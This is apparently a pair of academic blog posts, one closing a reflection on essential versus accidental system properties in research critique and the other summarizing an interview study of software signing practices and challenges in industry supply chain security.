I am reminded of the “Ship of Theseus” debate, where one considers whether, having replaced the oars, the deck, the rudder, the masts, the rigging, and all the other parts of a ship, whether it is indeed still the original ship. If you can replace all of those components with comparable parts equivalents, perhaps making the ship a bit faster or a bit easier to steer, and yet preserving the integral properties of the ship, I would say that you’re swapping in and out different accidental properties (different implementations of the same design). But if you make a crosscutting change, something that spans the whole system, that would take weeks or months or years of work rather than hours or days of work, then I would say you’re probably looking at an essential property of the system. By changing it, you’ve realized a conceptually different system. A cargo ship that’s 10% bigger is still a cargo ship; it’s not an aircraft carrier and it’s not a speed boat.

Applying philosophy to make sound criticisms

Now, what does this have to do with criticizing prior work? Here’s the bottom line: If you are criticizing prior work for an accidental property then your criticism is misplaced. If the property is really an accidental one, then just change the prior work — it’ll take a few days and then the problem goes away, much easier than spending 6 months to a year on your new system. Meanwhile, if you are criticizing prior work for an essential property, then is well. By definition, there is no alternative implementation of the system you are criticizing that could possibly avoid that limitation. Thus you’re on firm ground to criticize it for that reason.

Applying philosophy to write better papers (and system design docs)

This notion of essential and accidental properties can also be applied to analyze one’s own system.

First of all, if you are proposing a new system, you must take the effort of articulating the conceptual changes, not just the engineering ones. Research papers must describe new concepts, not just new engineering work; this is what reviewers mean when they say that a paper is just engineering (prior to rejecting it). Of course, any new concept must be operationalized in order to evaluate it, but the contribution of the paper is the ideas, not the implementation. Make sure that your paper points out the essential properties of your idea.
To complement this, when I describe the limitations of my systems, I like to divide the section into two parts. The first part describes the essential limitations, and the second the accidental limitations. I take the time to make sure my reader sees which shortcomings are “baked in”, and which could be changed with a bit of coding. I hope that such an analysis helps future readers avoid making this class of analysis error, and to help them see the directions I perceive for substantial improvements (read as: new papers) by distinguishing the conceptual vs. implementation choices in my work.

What about non-systems papers?

I use this same kind of thinking when I write empirical software engineering papers. In such works, the convention is to write a Threats to Validity section which delineates threats by construct, internal, and external categories. The temptation is to enumerate all the ways in which your study might be biased, from the transcription system you used, to the projects you selected, through to what you ate for lunch that day. Of course, not all of these things are essential limitations of your work — some of them are accidental. Does it really matter which transcription service you use for your interview data? Does it really matter which survey software you used to collect survey data? No, I don’t think so. On the other hand, it matters quite a bit which software you selected for analysis, which demographic characteristics you controlled for in a sample, and which defects you selected for analysis. I always ask my students to describe the essential limitations of our work more than the accidental ones. Sometimes there are substantial “accidental” concerns that must be acknowledged, but we always start by describing what we perceive as the essential ones. Again, part of the goal is to help readers see where there is room for more research papers!

An Industry Interview Study of Software Signing for Supply Chain Security

James Davis — Thu, 10 Apr 2025 01:48:10 GMT

This is a brief for the research paper “An Industry Interview Study of Software Signing for Supply Chain Security”, published at the 2025 USENIX Security Symposium. This work was led by Kelechi Kalu. The full paper is available here. Kelechi Kalu wrote this brief, which I have lightly edited.

Motivation

Most cybersecurity-oriented folks have heard or read about the SolarWinds attack of 2020. SolarWinds affected many high-profile organizations, including the Department of Defense (DoD). This incident is often regarded as the poster child of software supply chain attacks. In response, new regulations (e.g., NIST guidelines and Executive Order 14028), security frameworks (e.g., SLSA, SSCIM), and academic proposals have emerged, all emphasizing the critical need for establishing software provenance through methods like software signing.

While these frameworks and regulations recommend signing, they do not provide concrete implementation models to guide adoption. In practice, measurement studies have shown that the software supply chain frequently suffers from missing or erroneous signatures, highlighting a gap between policy recommendations and real-world execution.

The effectiveness of software signing depends on careful adoption strategies. A deeper examination of current signing practices and the rationale behind them is essential for understanding its real-world implications. With that goal in mind, let’s get started.

Key terms and definitions

Before explaining our study, we’ll need some details about two key concepts — software supply chains and software signing.

Software Supply Chains

Software production is often visualized through a model that approximates the software engineering process, integrating both first- and third-party components, which are then packaged for downstream use. This combination of engineering processes and distribution forms the software supply chain, illustrated below.

The software supply chain factory model visualizing the software supply chain.

The security of the software supply chain is broadly defined by three key properties:

Validity — Ensuring the integrity of components and actors.
Transparency — Maintaining knowledge of components and actors.
Separation — Isolating components and actions performed by different actors within the supply chain.

The combination of validity and transparency establishes provenance — a crucial aspect of software security. Security techniques aim to enhance one or more of these properties to strengthen overall software supply chain security.

Software Signing

Software signing is a formally guaranteed method of establishing the authorship of software. It employs public-key cryptography to create a hash of the software binary, which is then encrypted with a private key. This process supports two of the security properties given above:

Validity — The signed artifact has not been altered since it was last signed.
Transparency — The contents of the artifact are verifiable.

Together, these properties contribute to provenance, helping establish trust in the integrity and authorship of software components.

A more detailed discussion of the signing process is available in our prior work, Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors.

Empirical studies on software signing in open-source ecosystems have raised concerns regarding usability challenges, opportunities for exploitation, and low adoption rates. Our work takes a qualitative approach to exploring software signing practices in industry, aiming to answer key questions on effective signing strategies, adoption challenges, and the factors influencing its implementation.

Methodology

To investigate software signing adoption practices, we conducted 18 semi-structured interviews with experienced security practitioners from 13 organizations. Our participants were either responsible for initiating or implementing security controls within their organizations or worked in organizations that produced security products.

To develop our interview protocol, we drew insights from three key sources:

Academic literature on software security and signing.
The software supply chain factory model to contextualize signing within broader supply chain processes.
Grey literature, including industry reports on software signing usage.

By incorporating these diverse sources, we ensured that our questions were grounded in both theoretical understanding and real-world industry practices. Then, for data analysis, we employed a thematic and framework analysis approach to identify patterns and insights from participant responses. The figure below illustrates this:

A summary of our study design and analysis process. We incorporated multiple sources to inform our study instrument design. Depending on the research question, we applied thematic analysis (inductive) or a combination of thematic and framework analysis (using the previously described software supply chain factory model).

Key Results

We present some of the key findings from our research next. A more comprehensive set of results can be found in our accompanying paper.

How is Signing Applied in Practice?

We first examined where in the software engineering process software signing is implemented by development teams. To conduct this analysis, we used the software supply chain factory model (pictured above) as a reference framework. Based on participant responses, we modified the model to explicitly indicate the points in the software engineering process where provenance is — and should be! — established and verified. These points are summarized in the figure below.

Our modified software supply chain factory model highlighting different expected signing use points. These points are categorized based on whether they involve signing (S) or verification (V) of signatures. We also indicate the number of participants, out of 18, who adopt signing at these stages. (PI — Internal contributors sign commits, VI — Verify signatures from internal contributors, PE — External contributors sign commits, VE — Verify signatures from external contributors, PS — Signing after code reviews/audits, VS — Verify source code signatures before build, PB — Signing of build output, VB — Verify build signature before deployment, PA — Signing of the final software product, VA — Verification by final customers, PD — Signing after verification and certification of dependencies, VD — Verify signatures from external dependencies.)

From the figure, we observe that:

Most teams establish software signatures at the final product phase, the build phase, or after an internal source code review process (or even require signing from internal code contributors).
However, many teams omit signature verification.

What are the Challenges of Software Signing Implementation?

We asked subjects what challenges they experience as they implement signing. The following table summarizes what we learned.

A summary of the challenges articulated by our participants affecting their implementation of software signing. Using thematic analysis, we theme these into Technical, Organizational, and Human Challenges. While some of these issues have been highlighted we provide the first empirical investigations for these.

Verification problems were widely acknowledged by practitioners as a significant challenge. Our results also revealed subtle patterns indicating that participants from organizations of similar sizes reported similar types of issues. For example, only participants from large organizations reported difficulties in operationalizing the signing process, while only participants from organizations with non-security-focused product areas cited a lack of management incentives for adoption.

How do factors such as security standards, regulations, and software supply chain incidents impact the implementation/adoption of software signing?

We found that security failures primarily lead to direct fixes rather than large-scale security overhauls, with only a few instances prompting changes in software signing practices. Most incidents experienced by organizations were non-malicious vulnerabilities or operational failures rather than targeted attacks. When signing adoption was influenced, it was typically in response to specific security-critical needs, such as ensuring traceability in high-assurance environments.

Our results also show that while security regulations and frameworks shape broader security strategies — such as the adoption of SBOMs — they have minimal direct impact on software signing implementation. Organizations tend to comply with these regulations by enhancing general security processes rather than specifically integrating signing as a core security measure.

The following table gives a quantitative view of our data.

Kinds of software supply chain failures experienced, and associated security changes. Only one participant reported an influence of these failures on their software signing implementation. Software supply chain failures were more likely to prompt a direct fix rather than a change in the security process.

Conclusions and next steps

Our results show that while software signing is important, several challenges still limit its effective implementation. In its current state, software signing may not yet provide its full intended benefits. Our work addresses some of these challenges by refining the software supply chain factory model to clearly indicate where signing should be established and verified.

However, urgent issues in verification still need to be resolved, and security standards should emphasize the importance of software signing alongside SBOMs and other transparency techniques. Additionally, software signing tools should be designed to improve their usability, ensuring that both signature creation and verification processes are more accessible and efficient.

What’s Next for Us?

We are currently studying the usability of software signing tools, particularly Sigstore. Additionally, we are actively researching the state of software signature verification in open-source repositories. Breakthroughs in this area could contribute significantly to establishing trust in open-source ecosystems and improving overall security practices.

Want to learn more?

You can read the full paper here. Some of our related papers are this one and that one and also that other one. After the symposium in August 2025, our slides and recording will also be available on the USENIX website!